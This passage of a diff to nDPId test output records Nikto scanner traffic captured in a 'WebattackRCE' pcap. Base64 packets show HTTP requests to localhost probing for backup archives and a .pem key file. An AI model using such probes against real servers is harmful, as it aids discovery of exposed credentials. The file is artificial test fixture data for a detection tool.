-01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1576420277127,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277127,"pkt":"AAAAAAAAAAAAAAAACABFAADBPaVAAEAG\/o9\/AAABfwAAAcPKH5CdTAUjrG8+WIAYAED+tQAAAQEICp1m\/K+dZvyvR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1576420277128,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277128,"pkt":"AAAAAAAAAAAAAAAACABFAADBZB5AAEAG2BZ\/AAABfwAAAcPMH5CtKVyfkMJlVIAYAED+tQAAAQEICp1m\/LCdZvywR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1576420277130,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277130,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JsdAAEAGFXJ\/AAABfwAAAcPOH5Ap0h5I7vzLNIAYAED+sQAAAQEICp1m\/LKdZvyyR0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1576420277134,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277134,"pkt":"AAAAAAAAAAAAAAAACABFAAC9UWBAAEAG6th\/AAABfwAAAcPQH5CgyWnegf\/5dIAYAED+sQAAAQEICp1m\/LWdZvy1R0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1576420277136,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277136,"pkt":"AAAAAAAAAAAAAAAACABFAADFelpAAEAGwdZ\/AAABfwAAAcPSH5CODELdlJWwD4AYAED+uQAAAQEICp1m\/LedZvy3R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1576420277141,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277141,"pkt":"AAAAAAAAAAAAAAAACABFAADF+nFAAEAGQb9\/AAABfwAAAcPUH5Dn1sLrZe4ChoAYAED+uQAAAQEICp1m\/L2dZvy9R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1576420277142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277142,"pkt":"AAAAAAAAAAAAAAAACABFAADHb5RAAEAGzJp\/AAABfwAAAcPWH5B0BVcY3NxdJYAYAED+uwAAAQEICp1m\/L6dZvy+R0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 